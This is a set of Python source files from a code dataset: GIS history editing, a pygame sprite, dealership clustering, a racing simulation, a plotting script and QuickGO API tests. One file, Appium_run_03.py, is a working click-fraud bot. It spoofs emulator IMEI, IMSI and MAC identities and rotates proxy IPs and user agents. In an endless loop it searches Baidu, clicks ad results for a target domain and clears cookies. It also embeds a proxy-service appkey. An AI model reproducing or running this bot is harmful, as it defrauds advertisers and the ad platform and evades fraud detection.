elif historyFeature.mode.mode == Mode.Modification:\n                self.histoLayer.updateHistoFeature(historyFeature.feature, eventDate, eventMap[historyFeature.eventIndex], self.valueMaps)\n            elif historyFeature.mode.mode == Mode.Suppression:\n                self.histoLayer.deleteHistoFeature(historyFeature.feature, eventDate, eventMap[historyFeature.eventIndex])\n\n        self.histoLayer.commitChanges()\n\n        self.iface.messageBar().pushMessage(\"Information\", \"L'historisation des objets est terminée\", Qgis.Info)\n","sub_path":"Historisation/maplayer.py","file_name":"maplayer.py","file_ext":"py","file_size_in_byte":7294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"586712822","text":"# Requires the Appium Python client package:\n# pip install Appium-Python-Client\nimport os\nimport random\nimport re\nimport subprocess\nimport time\nimport traceback\nfrom multiprocessing import Pool\n\nimport jieba\nimport requests\nfrom appium import webdriver\nfrom selenium.common.exceptions import UnexpectedAlertPresentException\nfrom selenium.webdriver.common.keys import Keys\n\nfrom APP_UA import UA\n\n\n# Exception class for raising errors explicitly\nclass CustomError(Exception):\n    def __init__(self, ErrorInfo):\n        super().__init__(self)  # initialise the parent class\n        self.errorinfo = ErrorInfo\n\n    def __str__(self):\n        return self.errorinfo\n\n\nclass Chrom_Run():\n    def __init__(self, Cellphone_id, Mitmproxy_port, Appium_port):\n        self.mitmproxy_port = Mitmproxy_port\n        self.Appium_port = Appium_port\n        # redis database connection\n        # self.pool = redis.ConnectionPool(host='localhost', port=6379, db=1)\n        # self.redis = redis.Redis(connection_pool=self.pool)\n        # self.redis.set('ips', 'A')\n        self.UA = UA\n        self.ip_url = \"http://webapi.http.zhimacangku.com/getip?num=1&type=1&pro=&city=0&yys=100017&port=1&pack=63643&ts=0&ys=0&cs=0&lb=1&sb=0&pb=45&mr=1&regions=&gm=4\"\n        self.ua = random.choice(self.UA)\n        print(self.ua)\n        time.sleep(random.random())\n        
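# Fetch a proxy IP from the Zhima API; it replies in plain text, and the literal\n        # Chinese strings matched below are the API's own error messages.\n        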
ip = requests.get(self.ip_url, timeout=5).text\n        if \"再试\" in str(ip):  # the API asked us to retry\n            time.sleep(random.randint(1, 4))\n            ip = requests.get(self.ip_url, timeout=5).text\n        # if this machine is not whitelisted yet, register it on the whitelist\n        elif \"请添加白名单\" in str(ip):\n            self_ip = re.compile('\"请添加白名单(.*?)\",\"', re.S).findall(str(ip))[0]\n            print(\"Adding to whitelist, local IP:\", self_ip)\n            try:\n                x = requests.get(\n                    \"http://web.http.cnapi.cc/index/index/save_white?neek=79185&appkey=7b4bb8a059ff41c8f6782f11e73bff30&white={}\".format(\n                        self_ip))\n                print(x.text)\n            except Exception as f:\n                print(\"Whitelist registration failed >>>\", f)\n            time.sleep(1)\n            ip = requests.get(self.ip_url, timeout=5).text\n        self.ip = ip.strip()\n        try:\n            print(\"Testing IP >>> current proxy IP:\", self.ip)\n            i = int(self.ip.split(\":\")[1])\n        except Exception as f:\n            print(\"Failed to obtain a proxy IP, exiting\")\n            return\n        self.cap = {\n            \"platformName\": \"Android\",\n            # \"platformVersion\": \"5.1.1\",  # change to match the Android version; ideally below 7\n            \"platformVersion\": \"5.1.1\",  # change to match the Android version; ideally below 7\n            \"deviceName\": Cellphone_id,  # the device identifier\n            # \"appPackage\": \"com.android.chrome\",  # use this for hybrid apps\n            \"appActivity\": \"org.chromium.chrome.browser.ChromeTabbedActivity\",\n            # org.mozilla.focus.activity.MainActivity\n            \"browserName\": \"Chrome\",  # use this for a browser\n            # \"browserName\": \"Firefox\",  # use this for a browser\n            \"noReset\": True,  # do not reset between sessions\n            'unicodeKeyboard': True,  # enable the Unicode IME\n            'resetKeyboard': True,  # restore the original IME when finished\n            \"noSign\": True,\n            \"autoAcceptAlerts\": True,  # accept alerts/agreements automatically\n            \"automationName\": \"UiAutomator1\",  # pin the UiAutomator version; defaults to the latest\n            'dontStopAppOnReset': False,  # do not close the app\n            'autoGrantPermissions': True,  # grant permissions automatically\n            # allow passing chromeOptions arguments\n            \"chromeOptions\": {\n                \"args\": ['--incognito', '--disable-search-geolocation-disclosure', \"user-agent={}\".format(self.ua),\n                         '--proxy-server=http://{}'.format(self.ip)]}  # allow passing chromeOptions arguments\n        }\n        with open(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\gjc.txt\", 'r')as f:\n            m = f.read()\n        self.gjcs = m.split(\"\\n\")\n        # self.gjcs = gjc\n        print(Cellphone_id, \"|||\", self.Appium_port)\n        self.driver = webdriver.Remote(\"http://localhost:\" + str(self.Appium_port) + \"/wd/hub\", self.cap)\n        with open(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\pbc.txt\", 'r')as f:\n            m = f.read()\n        self.urls = m.split(\"\\n\")\n\n    def huadong(self):\n        x1 = int(self.driver.get_window_size()['width'] * 0.5)\n        y1 = int(self.driver.get_window_size()['height'] * 0.75)\n        y2 = int(self.driver.get_window_size()['height'] * 0.25)\n        # for i in range(1):\n        self.driver.swipe(x1, y2, x1, y1)\n        # time.sleep(time.time())\n\n    def insert_login(self, name, url):\n        print(name, \"|\", url, \"|\", time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())), \"|\", \"Zhima proxy IP\")\n        with open(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\搜索日志.log\", \"a\", encoding=\"utf-8\")as f:\n            f.write(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))\n            f.write(\" \")\n            f.write(name)\n            f.write(\" \")\n            f.write(url)\n            f.write(\"\\n\")\n\n    # scroll the page down\n    def sub_hua_dong(self):\n        x1 = int(self.driver.get_window_size()['width'] * 0.5)\n        y1 = int(self.driver.get_window_size()['height'] * 0.75)\n        y2 = int(self.driver.get_window_size()['height'] * 0.25)\n        for i in range(random.randint(2, 4)):\n            self.driver.swipe(x1, y1, x1, y2)\n            self.driver.implicitly_wait(5)\n            
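# brief randomised pause between swipes to look less bot-like\n            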
time.sleep(random.randint(1, 4))\n\n    # scroll the page up\n    def sup_hua_dong(self):\n        x1 = int(self.driver.get_window_size()['width'] * 0.5)\n        y1 = int(self.driver.get_window_size()['height'] * 0.75)\n        y2 = int(self.driver.get_window_size()['height'] * 0.25)\n        for i in range(random.randint(1, 3)):\n            self.driver.swipe(x1, y2, x1, y1)\n            self.driver.implicitly_wait(5)\n            time.sleep(random.randint(1, 4))\n\n    # @retry(stop_max_attempt_number=3)\n    def get_baidu_index(self, name):\n        try:\n            print(\"Opening Baidu\")\n            self.driver.get(\"https://m.baidu.com/\")\n            self.driver.implicitly_wait(2)\n            # self.huadong()\n            try:\n                # self.driver.find_element_by_id(\"index-kw\")\n                self.driver.find_element_by_xpath('//input[@type=\"search\"]')\n            except:\n                self.driver.implicitly_wait(1)\n                self.driver.refresh()\n                print(\"Refreshing\")\n                self.driver.implicitly_wait(1)\n            # name1 = \"IP\"\n            name1 = list(jieba.cut(name))  # type the query one jieba-segmented token at a time\n            for i in name1:\n                # self.driver.find_element_by_xpath('//input[@type=\"search\"]').send_keys(i)\n                self.driver.find_element_by_id(\"index-kw\").send_keys(i)\n                time.sleep(random.random())\n            try:\n                self.driver.find_element_by_id(\"index-bn\").click()\n            except:\n                print(\"Submit click failed, sending ENTER instead\")\n                self.driver.find_element_by_id(\"index-bn\").send_keys(Keys.ENTER)\n        except Exception as f:\n            self.driver.switch_to.alert.accept()\n            print(\"Network error\")\n            return 0\n        else:\n            return 1\n\n    def _next(self, i):\n        v = random.randint(0, 1)\n        if v:\n            self.driver.switch_to.window(self.driver.window_handles[-1])\n        print(\"Click number\", i, self.driver.current_url)\n        x = len(self.driver.find_elements_by_xpath(\"//a\"))\n        self.driver.find_elements_by_xpath(\"//a\")[random.randint(5, x)].click()\n        self.sub_hua_dong()\n\n    def bak(self, name):\n        try:\n            self.driver.implicitly_wait(10)\n            self.sup_hua_dong()\n            x = self.driver.find_elements_by_xpath(\"//*[contains(@class,'c-showurl')]\")\n            m = list(filter(lambda v: \"广告\" in v.get_attribute('textContent'), x))  # keep only links whose text contains \"广告\" (Baidu's ad marker)\n            # print(\"ad-marked links\", m)\n            m1 = []\n            for i in m:\n                print(i.get_attribute('textContent'))\n                # for il in self.urls:\n                #     if il not in i.get_attribute('textContent'):\n                #         m1.append(i)\n                # print(\"links left after the blocklist filter\", m1)\n                # i2 = random.choice(m1)\n                # print(\"random pick from the filtered links\", i2)\n                te = i.get_attribute('textContent')\n                # te1 = str(te).replace(\"广告\", \"\")\n                # for i in self.urls:\n                #     if i in te:\n                #         return\n                # if \"pintai7\" in te:\n                #     return\n                # # elif \"pintai6\" in te:\n                # #     return\n                # elif \"21cxhua\" in te:\n                #     return\n                # print(te)\n                if \"pintai6\" in te:\n                    try:\n                        i.click()\n                    except Exception as f:\n                        traceback.print_exc()\n                        print(f)\n                        self.driver.execute_script(\"arguments[0].click();\", i)\n                    self.driver.implicitly_wait(10)\n                    # for i in self.urls:\n                    #     if i in self.driver.current_url:\n                    #         return\n                    print(self.driver.current_url)\n                    self.sub_hua_dong()\n                    try:\n                        self.driver.switch_to.window(self.driver.window_handles[-1])\n                        self.driver.implicitly_wait(5)\n                        print(self.driver.title)\n                        print(\"Selected:\", name, te, self.driver.current_url)\n                        self.insert_login(name, url=self.driver.current_url)\n                    except Exception as f:\n                        print(f)\n            try:\n                for i in range(5):\n                    self._next(i)\n            except Exception as f:\n                print(\"Next-page error, retrying once\")\n                for i in range(5):\n                    self._next(i)\n            # time.sleep(random.randint(10, 30))\n            print('Exiting')\n            return\n        except UnexpectedAlertPresentException:\n            self.driver.switch_to.alert.accept()\n        # self.clear_chrome_data()\n\n    # kill the mitmproxy process currently bound to our port\n    def kill_mitmproxy(self):\n        
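# Windows-specific approach: scrape netstat output for PIDs listening on the\n        # mitmproxy port, then taskkill any python process among them.\n        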
p = os.popen('netstat -aon|findstr \"{}\"'.format(self.mitmproxy_port))\n        p2 = p.read()\n        # version 1:\n\n        p2 = str(p2).split(\"\\n\")\n        p2 = p2[0:-1]\n        p3 = []\n        for i in p2:\n            x = re.compile(\"(\\d{1,5})$\").findall(i)[0]\n            if int(x) != 0:\n                p3.append(x)\n        p3 = set(p3)\n        p3 = list(p3)\n        for i in p3:\n            p = os.popen('tasklist|findstr \"{}\"'.format(i))\n            p2 = p.read()\n            if \"thon\" in str(p2):\n                subprocess.Popen('taskkill -PID {} -F'.format(i))\n                print(\"Stopping mitmproxy service, port:\", i)\n        # version 2 rewrite with lambda -- did not work:\n        # for i in list(filter(lambda x: int(x) != 0, set(\n        #         sum(list(map(lambda x: re.compile(\"(\\d{1,5})$\").findall(x), str(p2).split(\"\\n\")[0:-1])), []))))[1:]:\n        #     print(\"Stopping mitmproxy service, port:\", i)\n        #     subprocess.Popen('taskkill -PID {} -F'.format(i))\n\n    # clear browser cookies and cache\n    def clear_chrome_data(self):\n        try:\n            print(\"Deleting cookies\")\n            self.driver.delete_all_cookies()\n            print(\"Clearing local storage\")\n            self.driver.execute_script(\"window.localStorage.clear();\")\n        except Exception as f:\n            print(\"Cache clearing failed\", f)\n\n    # obtain a proxy IP\n    def get_ip(self):\n        ip = requests.get(self.ip_url, timeout=5).text\n        ip = ip.strip()\n        if len(ip) < 22:\n            print(\"Current IP:\", ip)\n            return ip\n        else:\n            time.sleep(1)\n            print(\"IP extraction failed:\", ip)\n            return self.get_ip()  # return the recursive result; the original dropped it and yielded None\n\n    # start the mitmproxy service\n    def start_mitmproxy_server(self):\n        self.kill_mitmproxy()\n        p = os.path.exists(\n            'C:\\\\Users\\\\Administrator\\\\Desktop\\\\vps3\\\\mitmproxy_log\\\\' + str(self.mitmproxy_port) + '.log')\n        if p:\n            pass\n        else:\n            print(\"Log file missing, creating it\")\n            with open('./mitmproxy_log/' + str(self.mitmproxy_port) + '.log', \"w\") as fp:\n                pass\n        cmd = \"mitmdump --mode=upstream:{} -p {}\".format(\n            self.get_ip(), str(self.mitmproxy_port))\n        print(\"Starting mitmproxy:\", cmd)\n        # return\n        subprocess.Popen(cmd, stdout=open(\n            'C:\\\\Users\\\\Administrator\\\\Desktop\\\\vps3\\\\mitmproxy_log\\\\' + str(self.mitmproxy_port) + '.log', 'a'),\n                         stderr=subprocess.STDOUT)\n        time.sleep(1)\n\n    def run(self):\n        # self._ip()\n        # self.start_mitmproxy_server()\n        # ua = random.choice(self.UA)\n        # self.redis.set(\"UA\", ua)\n        try:\n            self.driver.delete_all_cookies()\n        except:\n            pass\n\n        try:\n            name = random.choice(self.gjcs)\n            try:\n                self.driver.implicitly_wait(10)\n                m = self.get_baidu_index(name)\n                if m == 0:\n                    print(m)\n                    self.driver.quit()\n                    return\n            except Exception as f:\n                print(f)\n                self.driver.quit()\n                return\n            urls = self.driver.find_elements_by_xpath('//div[@class=\"c-showurl c-line-clamp1\"]')\n            if not urls:\n                # self.start_mitmproxy_server()\n                # time.sleep(4)\n                self.driver.refresh()\n            self.sub_hua_dong()\n            time.sleep(random.randint(1, 4))\n            self.sup_hua_dong()\n            self.driver.implicitly_wait(5)\n            self.bak(name)\n            self.clear_chrome_data()\n        except Exception as f:\n            pass\n        finally:\n            try:\n                self.clear_chrome_data()\n            except Exception as f:\n                pass\n            print(\"Closing the browser\")\n            self.driver.quit()\n\n\ndef run_app(Cellphone_id, Mitmproxy_port, Appium_port):\n    # hk = str(Cellphone_id).split(\":\")[1]\n    # if hk:\n    #     if int(hk) == 62001:\n    #         Mitmproxy_port = 8080\n    #     else:\n    #         k = int(hk) - 62025\n    #         Mitmproxy_port += 1 + int(k)\n    # Cellphone_id: emulator ID\n    # Mitmproxy_port: mitmproxy port number\n    try:\n        # before starting, check whether the Appium port is taken; kill the owning process if so\n        p = os.popen('netstat -aon|findstr \"{}\"'.format(Appium_port))\n        p2 = p.read()\n        for i in list(filter(lambda x: int(x) != 0, set(\n                sum(list(map(lambda x: re.compile(\"(\\d{1,5})$\").findall(x), str(p2).split(\"\\n\")[0:-1])), [])))):\n            print(\"Stopping Appium service, port:\", i)\n            subprocess.Popen('taskkill -PID {} -F'.format(i))\n        # start the Appium service\n        host = '127.0.0.1'\n        bootstrap_port = str(Appium_port + 1)\n        cmd = 'appium -a ' + host + ' -p ' + str(Appium_port) + ' -bp ' + str(\n            bootstrap_port + \" -U \" + str(Cellphone_id))\n        print(Cellphone_id, \"|||\", cmd)\n        subprocess.Popen(cmd, shell=True, stdout=open(\n            'C:\\\\Users\\\\Administrator\\\\Desktop\\\\vps3\\\\appium_log\\\\' + str(Appium_port) + '.log', 'a'),\n                         stderr=subprocess.STDOUT)\n        while True:\n            try:\n                print(\"Cellphone_id: \", Cellphone_id, \" Mitmproxy_port: \", Mitmproxy_port, \" Appium_port:\",\n                      Appium_port)\n                # start the worker\n                time.sleep(random.randint(1, 4))\n                
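# each cycle builds a fresh Chrom_Run, so every search gets a new UA and proxy IP\n                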
mians = Chrom_Run(Cellphone_id, Mitmproxy_port, Appium_port)\n                mians.run()\n                # name = \"name\"\n                # mians.get_baidu_index(name)\n                print(\"One click cycle finished\")\n            except:\n                pass\n    except Exception as f:\n        print(f)\n\n\nif __name__ == \"__main__\":\n    # random MAC address\n    def randomMAC():\n        mac = [0x52, 0x54, 0x00,\n               random.randint(0x00, 0x7f),\n               random.randint(0x00, 0xff),\n               random.randint(0x00, 0xff)]\n        return ':'.join(map(lambda x: \"%02x\" % x, mac))\n\n\n    # kill the previous adb service\n    subprocess.Popen('adb kill-server')\n    time.sleep(1)\n    subprocess.Popen('adb start-server')\n    time.sleep(1)\n    # quit any previously running Nox emulators\n    subprocess.Popen('nox -quit')\n    time.sleep(0.2)\n    for i in range(1, 5):\n        subprocess.Popen('nox -clone:Nox_{} -quit'.format(str(i)))\n        time.sleep(0.2)\n    time.sleep(5)\n    # relaunch the Nox emulators with randomised identities\n    for i in range(1, 5):\n        phone = random.randint(18511223344, 18711223344)\n        phoneNumber = random.randint(18511223344, 18711223344)\n        IMEI = random.randint(861414011000000, 861414011999999)\n        IMSI = random.randint(460010000000000, 460019999999999)\n        MAC = str(randomMAC())\n        subprocess.Popen(\n            \"Nox.exe -clone:Nox_{} -phoneNumber:{} -imei:{} -imsi:{} -mac:{} -root:True\".format(i, phoneNumber, IMEI,\n                                                                                               IMSI, MAC))\n        time.sleep(10)\n    time.sleep(20)\n    p = os.popen(\"adb devices\")\n    x = str(p.read()).split(\"\\n\")[1:]\n    Cellphone_ids = []\n    for i in x:\n        if i != \"\":\n            x = str(i).split(\"\\t\")[0]\n            if \"device\" in str(i).split(\"\\t\")[1]:\n                Cellphone_ids.append(x)\n    print(Cellphone_ids)\n    pools = Pool()\n    # create the process pool and fan the emulators out across the port ranges\n    while True:\n        try:\n            for Cellphone_id, mitmproxy_port, Appium_port in zip(Cellphone_ids, range(8080, 8088),\n                                                                 range(4723, 8080, 2)):\n                pools.apply_async(run_app, args=(Cellphone_id, mitmproxy_port, Appium_port))\n            pools.close()\n            pools.join()\n        except:\n            pass\n","sub_path":"Appium_run_03.py","file_name":"Appium_run_03.py","file_ext":"py","file_size_in_byte":18202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"21696997","text":"from .Base import *\n\nclass Sprite(Base):\n\n    def __init__(self, x, y, ancho, alto, ruta):\n        Base.__init__(self, x, y, ancho, alto, ruta)\n\n    def Animacion_Corazones(self, frames_totales, ventana):\n        if self.rect.x <= 750:\n            self.rect.x += 6\n            if frames_totales % 5 == 0 and self.ancho > 0 and self.alto > 0:\n                self.ancho -= 1\n                self.alto -= 1\n                self.image = pygame.transform.scale(self.image, (self.ancho, self.alto))\n                self.image = pygame.image.load(\"corazon_invertido.png\")\n                self.ancho -= 1\n                self.alto -= 1\n                self.image = pygame.image.load(\"Corazon.png\")\n                self.image = pygame.transform.scale(self.image, (self.ancho, self.alto))\n        if self.rect.x > 750:\n            self.rect.y -= 6\n            self.rect.x += 2\n\n    def Animacion_Monedas(self, posx, posy):\n        self.rect.y -= 15\n        if self.rect.y < 250:\n            self.rect.x += 30\n        else:\n            self.rect.x += 25\n        if self.rect.x > 750 and self.rect.y < 200:\n            self.rect.x = posx\n            self.rect.y = posy\n            return True","sub_path":"Clases/Sprites.py","file_name":"Sprites.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"557974748","text":"import numpy as np\nimport pandas as pd\nimport sqlite3 as sql\nimport matplotlib.pyplot as plt\nimport csv\nfrom sklearn.cluster import DBSCAN\nfrom sklearn.cluster import MiniBatchKMeans\nfrom sklearn.cluster import KMeans\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import silhouette_score\n\n# read in aggregate data on each dealership from DB. 
Then cluster the 96\n# dealership points in that N-dimensional space.\n\nclass Model:\n    def __init__( self, **kwargs ):\n        dbPath = kwargs[ 'pathToDB' ]\n        rankFilePath = kwargs[ 'pathToRankFile' ]\n        self.readROs( dbPath )\n\n    def readROs( self, dbPath ):\n        conn = sql.connect( dbPath )\n        cursor = conn.cursor()\n        query = \"\"\" SELECT Mileage, Customer_Total, Warranty_Total,\n                    Customer_Total + Warranty_Total + Internal_Total AS sales,\n                    Labor_Time FROM orders WHERE Mileage != '';\"\"\"\n        cursor.execute( query )\n        res = cursor.fetchall()\n        self.orders = np.array( res, dtype = 'float' )\n\n\n    def readDealerRanks( self, rankFilePath ):\n        pass\n\n\n    def readData( self, **kwargs ):\n        # read in data from SQL DB to a pandas data frame\n        path = kwargs[ 'pathToDB' ]\n        conn = sql.connect( path )\n        cursor = conn.cursor()\n\n        query = \"\"\"SELECT dealer_id, num_ROs, sales, efficiency, outOfWarrantyFraction,\n                   quarterly_growth FROM metric1;\"\"\"\n        cursor.execute( query )\n        res = cursor.fetchall()\n        res = np.array( res )\n\n        tmp = res[ :, 0 ]\n        dealerIDs = [ int( x ) for x in tmp ]\n        df = pd.DataFrame( np.nan, index = dealerIDs,\n                           columns = [ \"volume\", \"sales\", \"efficiency\",\"outOfWarranty\",\n                                       \"growth\", \"marketAffluence\", \"primaryMake\" ] )\n        df.iloc[ :, :5 ] = res[ :, 1: ]\n\n        # Fill up a dictionary containing median household income for each zip code\n        zipDict = {}\n        path = kwargs[ 'pathToZIPFile' ]\n        with open( path, 'r' ) as fp:\n            reader = csv.reader( fp )\n            next( reader )  # skip the header row; reader.next() was Python 2 only\n            for row in reader:\n                zipDict[ row[ 0 ].rjust( 5, '0' ) ] = float( row[ 1 ] )\n        medianIncome = np.median( list( zipDict.values() ) )  # dict views need list() in Python 3\n\n        # calculate mean household income from each dealership's market\n        query = \"\"\"SELECT dealer_id, zip FROM orders;\"\"\"\n        cursor.execute( query )\n        orderZips = cursor.fetchall()\n\n        # make a dictionary holding the average income of each dealer's market\n        marketAffluence = {}\n\n        for item in orderZips:\n            zipcode = item[ 1 ][ :5 ]  # only take 5-digit zip\n            if zipcode in zipDict:  # only use zips we have data for\n                dealer = item[ 0 ]\n                if dealer in marketAffluence:\n                    # calculate running average\n                    N = marketAffluence[ dealer ][ 1 ]\n                    tmp = marketAffluence[ dealer ][ 0 ] * N\n                    tmp += zipDict[ zipcode ]\n                    tmp /= ( N + 1 )\n                    marketAffluence[ dealer ] = [ tmp, N + 1 ]\n                else:\n                    # insert for the first time\n                    marketAffluence[ dealer ] = [ zipDict[ zipcode ], 1 ]\n\n        # put it in the dataframe\n        for dealer in marketAffluence:\n            if dealer in df.index:  # some dealers get dropped out of metric1?\n                df.loc[ int( dealer ), 'marketAffluence' ] = \\\n                    marketAffluence[ dealer ][ 0 ]\n\n        # get most serviced make for each dealer\n        query = \"\"\"SELECT dealer_id, make_Name from (select max(theCount),\n                   dealer_ID, make_Name FROM\n                   (select dealer_ID, count(make_name) AS theCount, make_name from\n                   orders GROUP BY dealer_id, make_name)\n                   GROUP BY dealer_ID)\n                   GROUP BY dealer_ID;\"\"\"\n        cursor.execute( query )\n        res = cursor.fetchall()\n        makeDict = { \"NISSAN\": 0, \"INFINITI\": 1 }\n\n        for item in res:\n            dealer = item[ 0 ]\n            make = item[ 1 ]\n            if dealer in df.index:\n                if make in makeDict:\n                    df.loc[ dealer, \"primaryMake\" ] = makeDict[ make ]\n                else:\n                    df.loc[ dealer, \"primaryMake\" ] = 3\n\n        self.data = df\n\n    def findBestClustering( self, maxClusters = 5 ):\n        cost = []\n        score = []\n        for nClusters in range( 2, maxClusters ):\n            inertia, silhouette = self.cluster( nClusters )\n            cost.append( inertia )\n            score.append( silhouette )\n\n        plt.plot( range( 2, maxClusters ), cost )\n        plt.show()\n
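        # Reading the elbow of the inertia curve together with the silhouette peak\n        # is the usual way to pick k from the two lists collected above.\n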
\n    def cluster( self, n_clusters = 3 ):\n        #data = self.data.values[ :, :-1 ]\n        data = self.orders\n\n        # feature scaling\n        scaler = MinMaxScaler()\n        X = scaler.fit_transform( data )\n\n        # keep a single name for the fitted estimator; the original mixed `clf` with\n        # an undefined `kmeans`, which raised a NameError\n        clf = KMeans( n_clusters = n_clusters, n_init = 50, n_jobs = -1 )\n        clf.fit( X )\n\n        labels = clf.labels_\n\n        score = silhouette_score( X, labels, metric = 'euclidean' )\n        return clf.inertia_, score\n\n        #self.inertia = clf.inertia_\n        #self.silhouette_score = score\n\n\ndef main( **kwargs ):\n    model = Model( **kwargs )\n    model.cluster()\n\nif __name__ == '__main__':\n    kwargs = { 'pathToDB': 'subset.sql',\n               'pathToRankFile': 'ranking.csv',\n               'pathToZIPFile': 'MedianZIP.csv'\n               }\n    main( **kwargs )\n","sub_path":"auto/dealerClustering2.py","file_name":"dealerClustering2.py","file_ext":"py","file_size_in_byte":5760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"572141028","text":"import numpy as np\nimport pickle\nimport matplotlib.pyplot as plt\nimport racing_env, racing_car, racing_sim, policy, utils\n\n\ndef tracking(args):\n    if args[\"simulation\"]:\n        track_spec = np.genfromtxt(\"data/track_spec/default.csv\", delimiter=\",\")\n        track_width = 1.0\n        track = racing_env.ClosedTrack(track_spec, track_width)\n        # setup ego car\n        ego = racing_car.DynamicBicycleModel(name=\"ego\", param=racing_car.CarParam(edgecolor=\"black\"))\n        ego.set_state_curvilinear(np.zeros((6,)))\n        ego.set_state_global(np.zeros((6,)))\n        if args[\"ctrl_policy\"] == \"pid\":\n            ego.set_ctrl_policy(policy.PIDTracking(vt=0.8))\n        elif args[\"ctrl_policy\"] == \"mpc-lti\":\n            matrix_A = np.genfromtxt(\"data/sys/LTI/matrix_A.csv\", delimiter=\",\")\n            matrix_B = np.genfromtxt(\"data/sys/LTI/matrix_B.csv\", delimiter=\",\")\n            matrix_Q = np.diag([10.0, 0.0, 0.0, 0.0, 0.0, 10.0])\n            matrix_R = np.diag([0.1, 0.1])\n            ego.set_ctrl_policy(policy.MPCTracking(matrix_A, matrix_B, matrix_Q, matrix_R, vt=0.8))\n        else:\n            raise NotImplementedError\n        ego.ctrl_policy.set_timestep(0.1)\n        # setup simulation\n        simulator = racing_sim.CarRacingSim()\n        simulator.set_timestep(0.1)\n        simulator.set_track(track)\n        simulator.add_vehicle(ego)\n        simulator.sim(sim_time=50.0)\n        with open(\"./data/simulator/tracking.obj\", \"wb\") as handle:\n            pickle.dump(simulator, handle, protocol=pickle.HIGHEST_PROTOCOL)\n    else:\n        with open(\"./data/simulator/tracking.obj\", \"rb\") as handle:\n            simulator = pickle.load(handle)\n    if args[\"plotting\"]:\n        simulator.plot_simulation()\n        simulator.plot_state(\"ego\")\n    if args[\"animation\"]:\n        simulator.animate(filename=\"tracking\")\n\n\nif __name__ == \"__main__\":\n    import argparse\n\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--ctrl-policy\", type=str)\n    parser.add_argument(\"--simulation\", action=\"store_true\")\n    parser.add_argument(\"--plotting\", action=\"store_true\")\n    parser.add_argument(\"--animation\", action=\"store_true\")\n    args = vars(parser.parse_args())\n    tracking(args)\n","sub_path":"examples/tracking.py","file_name":"tracking.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"606014981","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ndata = np.loadtxt(\"data.txt\").T\n\nx = np.arange(0,500)\nz = (x/5500)**2*np.log(x)\n \nplt.plot(data[0],data[1], 'ro-')\n\nplt.plot(x,z)\n\nplt.legend([\"Czas wykonania programu\",\"Krzywa $f(x)=x^2\\log x$\" 
])\nplt.xlabel(\"Liczba węzłów\")\nplt.ylabel(\"Czas wykonania (s)\")\nplt.title(\n \"Czas wykonywania implementacji algorytmu Dijkstry\")\nplt.show()","sub_path":"semestr-1/BAL/dijkstra/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"534232209","text":"from bioservices.quickgo import QuickGO\nfrom nose.plugins.attrib import attr\n\nclass test_quickGO(QuickGO):\n\n def __init__(self):\n super(test_quickGO, self).__init__(verbose=False, \n cache=False)\n\n def test_annotation_wrong_format(self):\n try:\n res = self.Annotation(tax='9606', frmt='tsddddddv')\n assert False\n except:\n assert True\n\n def test_annotation_format_col_compatibility(self):\n # if col provided, format can be only tsv\n try:\n res = self.Annotation(tax='9606', frmt='fasta', col=\"evidence\")\n assert False\n except:\n assert True\n\n # very slow !\n @attr('slow')\n def test_annotation_wrong_limit(self):\n try:\n res = self.Annotation(tax='9606', frmt='tsv', limit=-1)\n assert False\n except:\n assert True\n\n try:\n res = self.Annotation(tax='9606', frmt='tsv', limit=\"dummy\")\n assert False\n except TypeError:\n assert True\n except:\n assert False\n\n def test_annotation_no_protein_and_goid(self):\n try:\n self.Annotation(frmt='tsv', col=\"ref,evidence\",ref='PMID:*')\n assert False\n except ValueError:\n assert True\n\n def test_annotation_evidence(self):\n self.Annotation(protein='P12345', frmt='tsv', col=\"ref,evidence\", evidence=\"IDA\")\n self.Annotation(protein='P12345', frmt='tsv', col=\"ref,evidence\", evidence=[\"IDA\"])\n try:\n self.Annotation(protein='P12345', frmt='tsv',\n col=\"ref,evidence\",evidence=1)\n assert False\n except:assert True\n\n def test_annotation_aspect(self):\n self.Annotation(protein='P12345', frmt='tsv', col=\"ref,evidence\",aspect='F')\n self.Annotation(protein='P12345', frmt='tsv', col=\"ref,evidence\",aspect='C')\n self.Annotation(protein='P12345', frmt='tsv', col=\"ref,evidence\",aspect='P')\n try:\n self.Annotation(protein='P12345', frmt='tsv', col=\"ref,evidence\",aspect='dummy')\n assert False\n except:\n assert True\n\n\n def test_annotation_source(self):\n self.Annotation(protein='P12345', frmt='tsv',\n col=\"ref,evidence\",ref='PMID:*', source=\"UniProtKB\")\n self.Annotation(protein='P12345', frmt='tsv',\n col=\"ref,evidence\",ref='PMID:*', source=[\"UniProtKB\"])\n try:\n self.Annotation(protein='P12345', frmt='tsv',\n col=\"ref,evidence\",ref='PMID:*', source=111)\n assert False \n except:\n assert True\n\n def test_annotation_protein(self):\n print(self.Annotation(protein='P12345', frmt='tsv',\n col=\"ref,evidence\",ref='PMID:*'))\n\n def test_annotation_goid(self):\n print(self.Annotation(goid='GO:0003824', frmt='tsv',\n col=\"ref,evidence\"))\n\n def test_annotation_ref_PMID(self):\n res = self.Annotation(tax='9606', frmt='tsv', col=\"ref\",ref=\"PMID:*\")\n\n def test_annotation_qualifier(self):\n res = self.Annotation(tax='9606', frmt='tsv', \n col=\"ref,evidence,proteinID,goID,proteinTaxon,qualifier\",ref=\"PMID:*\", \n qualifier=\"NOT\")\n res = self.Annotation(tax='9606', frmt='tsv', \n col=\"ref,evidence,proteinID,goID,proteinTaxon,qualifier\",ref=\"PMID:*\", \n 